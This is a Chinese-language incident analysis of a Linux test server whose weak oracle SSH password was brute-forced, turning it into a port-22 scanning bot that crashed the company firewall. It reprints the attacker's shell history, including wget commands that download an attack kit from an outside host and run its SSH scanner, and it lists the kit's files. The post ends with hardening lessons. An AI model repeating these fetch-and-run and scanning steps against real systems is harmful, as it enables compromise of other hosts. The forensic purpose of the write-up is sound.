1、从防火墙瘫痪说起
今天还没到公司就被电话告知办公室无法正常连接互联网了,网速非常慢,无法正常浏览网页。急急忙忙感到公司,开始查找问题。
首先排除了交换机故障,因为内部局域网正常。当ping防火墙设备时,丢包严重。很明显,防火墙出了问题,撑不住了,其Web管理界面根本无法正常登陆。立即联系其服务商远程查找问题,经过近3个小时的分析,得出结论是网内有两台主机大量发送TCP数据包,瞬间就能在防火墙上造成40万链接数,大大超出了防火墙的处理能力,造成无法响应正常路由请求。我们暂且称这两台机器为A和B。把这两台机器断线之后,网路立刻正常了,防火墙上的链接数很快降低到正常水平。
主机A配置如下:
- OS - RedHat Enterprise Linux Server release 6.x
- 部署软件 - Tomcat,sshd, oracle
- RAM - 8GB
- CPU - Intel Core i3-2130
- IP地址 - 172.16.111.22
主机B为客户托管主机,具体配置不详。
本文只对主机A进行分析处理。
通过防火墙命令行界面,抓包发现A机器疯狂对一组IP地址进行22端口扫描。下面是抓包结果片段:
- proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:39895=====>183.58.99.130:22, packet=3, bytes=208[REPLY] 183.58.99.130:22=====>59.46.161.39:39895, packet=0, bytes=0
- proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:33967=====>183.58.99.131:22, packet=3, bytes=208[REPLY] 183.58.99.131:22=====>59.46.161.39:33967, packet=0, bytes=0
- proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:34117=====>183.58.99.132:22, packet=3, bytes=208[REPLY] 183.58.99.132:22=====>59.46.161.39:34117, packet=0, bytes=0
- proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:54932=====>183.58.99.125:22, packet=3, bytes=208[REPLY] 183.58.99.125:22=====>59.46.161.39:54932, packet=0, bytes=0
- proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:60333=====>183.58.99.135:22, packet=3, bytes=208[REPLY] 183.58.99.135:22=====>59.46.161.39:60333, packet=0, bytes=0
- proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:52737=====>183.58.99.136:22, packet=3, bytes=208[REPLY] 183.58.99.136:22=====>59.46.161.39:52737, packet=0, bytes=0
- proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:52291=====>183.58.99.137:22, packet=3, bytes=208[REPLY] 183.58.99.137:22=====>59.46.161.39:52291, packet=0, bytes=0
- proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:46183=====>183.58.99.138:22, packet=3, bytes=208[REPLY] 183.58.99.138:22=====>59.46.161.39:46183, packet=0, bytes=0
- proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:36864=====>183.58.99.139:22, packet=3, bytes=208[REPLY] 183.58.99.139:22=====>59.46.161.39:36864, packet=0, bytes=0
- proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:34515=====>183.58.99.133:22, packet=3, bytes=208[REPLY] 183.58.99.133:22=====>59.46.161.39:34515, packet=0, bytes=0
- proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:57121=====>183.58.99.134:22, packet=3, bytes=208[REPLY] 183.58.99.134:22=====>59.46.161.39:57121, packet=0, bytes=0
- proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:37830=====>183.58.99.140:22, packet=3, bytes=208[REPLY] 183.58.99.140:22=====>59.46.161.39:37830, packet=0, bytes=0
- proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:42742=====>183.58.99.141:22, packet=3, bytes=208[REPLY] 183.58.99.141:22=====>59.46.161.39:42742, packet=0, bytes=0
- proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:55018=====>183.58.99.142:22, packet=3, bytes=208[REPLY] 183.58.99.142:22=====>59.46.161.39:55018, packet=0, bytes=0
- proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:46447=====>183.58.99.143:22, packet=3, bytes=208[REPLY] 183.58.99.143:22=====>59.46.161.39:46447, packet=0, bytes=0
- proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:51039=====>183.58.99.147:22, packet=3, bytes=208[REPLY] 183.58.99.147:22=====>59.46.161.39:51039, packet=0, bytes=0
- proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:33123=====>183.58.99.146:22, packet=3, bytes=208[REPLY] 183.58.99.146:22=====>59.46.161.39:33123, packet=0, bytes=0
- proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:35956=====>183.58.99.151:22, packet=3, bytes=208[REPLY] 183.58.99.151:22=====>59.46.161.39:35956, packet=0, bytes=0
- proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:45002=====>183.58.99.145:22, packet=3, bytes=208[REPLY] 183.58.99.145:22=====>59.46.161.39:45002, packet=0, bytes=0
- proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:54711=====>183.58.99.150:22, packet=3, bytes=208[REPLY] 183.58.99.150:22=====>59.46.161.39:54711, packet=0, bytes=0
- proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:58976=====>183.58.99.155:22, packet=3, bytes=208[REPLY] 183.58.99.155:22=====>59.46.161.39:58976, packet=0, bytes=0
- proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:37967=====>183.58.99.157:22, packet=3, bytes=208[REPLY] 183.58.99.157:22=====>59.46.161.39:37967, packet=0, bytes=0
- proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:47125=====>183.58.99.158:22, packet=3, bytes=208[REPLY] 183.58.99.158:22=====>59.46.161.39:47125, packet=0, bytes=0
- proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:35028=====>183.58.99.156:22, packet=3, bytes=208[REPLY] 183.58.99.156:22=====>59.46.161.39:35028, packet=0, bytes=0
可以清晰的看到,肉鸡扫描程序疯狂扫描一个网段内的22端口。
2、查找黑客行踪的方法
对于Linux主机,出现问题后分析和处理的依据主要是日志。/var/log/messages、/var/log/secure都是必不可少的分析目标,然后就是.bash_history命令记录。黑客登录主机必然会在日志中留下记录,高级黑客也许可以删除痕迹,但目前大部分黑客都是利用现成工具的黑心者,并无太多技术背景。该主机对外开放三个TCP侦听端口:
- 22 sshd
- 80 Tomcat
- 1521 Oracle
这三个服务都有可能存在漏洞而被攻击,最容易被扫描攻击的还是sshd用户名密码被破解。所以最先分析 /var/log/secure日志,看登录历史。
3、沦陷过程分析
3.1 oracle用户密码被破解
分析/var/log/secure日志。不看不知道一看吓一跳,该日志已经占用了四个文件,每个文件都记录了大量尝试登录的情况,执行命令:
- cat secure-20150317 | grep 'Failed password' | cut -d " " -f 9,10,11 | sort | uniq
结果如下:
- invalid user admin
- invalid user dacx
- invalid user details3
- invalid user drishti
- invalid user ferreluque
- invalid user git
- invalid user hall
- invalid user jparksu
- invalid user last
- invalid user patrol
- invalid user paul
- invalid user pgadmin
- invalid user postgres
- invalid user public
- invalid user sauser
- invalid user siginspect
- invalid user sql
- invalid user support
- invalid user sys
- invalid user sysadmin
- invalid user system
- invalid user taz
- invalid user test
- invalid user tiptop
- invalid user txl5460
- invalid user ubnt
- invalid user www
- mysql from 10.10.10.1
- oracle from 10.10.10.1
- root from 10.10.10.1
可以看出攻击程序不断采用不同的账户和密码进行尝试。然后在接近尾部的地方发现如下2行,说明被攻破了。
- Mar 9 20:35:30 localhost sshd[30379]: Accepted password for oracle from 10.10.10.1 port 56906 ssh2
- Mar 9 20:35:30 localhost sshd[30379]: pam_unix(sshd:session): session opened for user oracle by (uid=0)
可见账户oracle的密码被猜中,并成功登入系统。
3.2 黑客动作推演
下面看看黑客用oracle账户都做了什么。首先复制一份oracle的命令历史,防止后续操作丢失该记录。
- cp /home/oracle/.bash_history hacker_history
然后查看分析这个文件。 我在后面备注了黑客的想法。
- vi .bash_profile
- vi .bash_profile (查看.bash_profile,看变量设置,把/home/oracle/bin增加到PATH)
- ll
- cd /
- vi .bash_profile
- vi .bash_profile (执行,设置环境变量)
- w
- ps x (查看系统运行进程)
- free -m (查看内存大小)
- uname -a (查看系统版本)
- cat /etc/issue (查看系统发行版)
- cat /etc/hosts (查看是否有网内机器)
- cat /proc/cpuinfo (查看CPU型号)
- cat .bash_history (查看oracle账户历史操作)
- w (查看系统负载)
- ls -a (查看/home/oracle/下的隐藏文件)
- passwd (修改掉oracle账户的密码)
- exit
- ls
- oracle
- sqlplus (运行sqlplus)
- su (试图切换到root账户)
- app1123456 (猜测root密码)
- ls
- su -
- w
- free -m
- php -v (查看php版本)
- exit
- w
- free -m
- php -v
- ps aux
- ls -a
- exit
- w
- free -m
- php -v
- cat bash_his (查看历史命令)
- cat bash_history
- cat .bash_history
- wget scriptcoders.ucoz.com/piata.tgz (下载肉鸡攻击软件包)
- tar zxvf piata.tgz (解压软件包)
- rm -rf piata.tgz (删除软件包)
- cd piata/ (切换到攻击软件目录)
- ls -a
- chmod +x *
- ./a 210.212 (运行攻击软件)
- screen (试图运行screen命令,发现没有后下载它)
- ls -a
- wget scriptcoders.ucoz.com/screen.tgz
- tar zxvf screen.tgz (解压)
- ./screen
- exit
- w
- ps x
- cd piata/ (切换到攻击软件目录)
- ls -a
- cat vuln.txt (查看攻击结果)
- ls -a
- mv vuln.txt 1.txt (保存攻击结果)
- ./screen -r
- nano 1.txt (查看结果文件)
- w
- ps x
- exit
- cd piata
- ps x
- ls -a
- nano 2.txt
- exit
- w
- ps x
- cd piata/
- ls -a
- cat
- mv vuln.txt 2.txt (保存结果)
- nano 2.txt
- w
- ps x
- cd piata/
- ls- a
- cat vuln.txt
- rm -rf vuln.txt
- ./screen -r
- exit
- w
- ps x
- cd piata/
- ls -a
- cat vuln.txt
- ls -a
- mv vuln.txt 3.txt (保存结果)
- nano 3.txt
- exit
- w
- ps x
- cd piata/
- ls -a
- cat vuln.txt
- rm -rf vuln.txt
- exit
- w
- ps x
- cd piata/
- ls -a
- cat vuln.txt
- rm -rf vuln.txt
- rm -rf 1.txt
- rm -rf 2.txt
- rm -rf 2.txt.save
- rm -rf 3.txt
- screen -r
- ./screen -r
- exit
- w
- ps x
- cd piata/
- ls -a
- cat vuln.txt
- ls -a
- nano vuln.txt
- rm -rf vuln.txt
- screen -r
- ./screen -r
- exit
- w
- ps x
- cd piata/
- ls -a
- cat vuln.txt
- nano vuln.txt
- w
- ls -a
- rm -rf vuln.txt
- screen -r
- ./screen -r
- exit
- w
- ps x
- cd piata/
- ls -a
- cat vuln.txt
- rm -rf vuln.txt
- ps x
- ls -a
- ./screen -r
- exit
- w
- ps x
- cd piata/
- ls -a
- cat vuln.txt
- nano vuln.txt
- w
- rm -rf vuln.txt
- ./screen -r
- exit
3.3 攻击工具一览
前面通过命令历史记录,可以看出攻击工具软件包为名为piata。下载来看看它的面目。
- [root@localhost piata]# ll
- total 1708
- -rw-r--r--. 1 oracle oinstall 0 Mar 10 13:01 183.63.pscan.22
- -rwxr-xr-x. 1 oracle oinstall 659 Feb 2 2008 a
- -rwxr-xr-x. 1 oracle oinstall 216 May 18 2005 auto
- -rwxr-xr-x. 1 oracle oinstall 283 Nov 25 2004 gen-pass.sh
- -rwxr-xr-x. 1 oracle oinstall 93 Apr 19 2005 go.sh
- -rwxr-xr-x. 1 oracle oinstall 3253 Mar 5 2007 mass
- -rwxr-xr-x. 1 oracle oinstall 12671 May 18 2008 pass_file
- -rwxr-xr-x. 1 oracle oinstall 21407 Jul 22 2004 pscan2
- -rwxr-xr-x. 1 oracle oinstall 249980 Feb 13 2001 screen
- -rw-r--r--. 1 oracle oinstall 130892 Feb 3 2010 screen.tgz
- -rwxr-xr-x. 1 oracle oinstall 453972 Jul 13 2004 ss
- -rwxr-xr-x. 1 oracle oinstall 842736 Nov 24 2004 ssh-scan
- -rw-r--r--. 1 oracle oinstall 2392 Mar 10 05:03 vuln.txt
其中 a, auto, go.sh gen-pass.sh, 都是bash脚本文件,用于配置扫描网段,调用扫描程序。pscan2和ssh-scan则为扫描程序。 vuln.txt记录获得的肉鸡列表。
目前尚未发现其他系统文件被黑客修改,也没有自动运行攻击软件的设置。
4 深刻教训
虽然这次被攻击的机器只是一个测试主机,其本身的重要性并不高,但却造成了防火墙的瘫痪,进而造成互联网不能正常访问。对此,必须引起足够重视,并从中汲取教训。
系统账户密码一定要有一定的复杂度。这次攻击就是由于oracle账户密码过于简单所致。
sshd采用密码方式登录风险很大,特别是密码简单的时候。可行的情况下,尽量关闭密码方式,改用公钥方式。
作为数据中心管理员,一定要监督监管系统管理员和软件开发商的服务安全,本次被攻击主机就是把所有权限都放给了网站开发公司,而开发公司对运营安全并不重视。
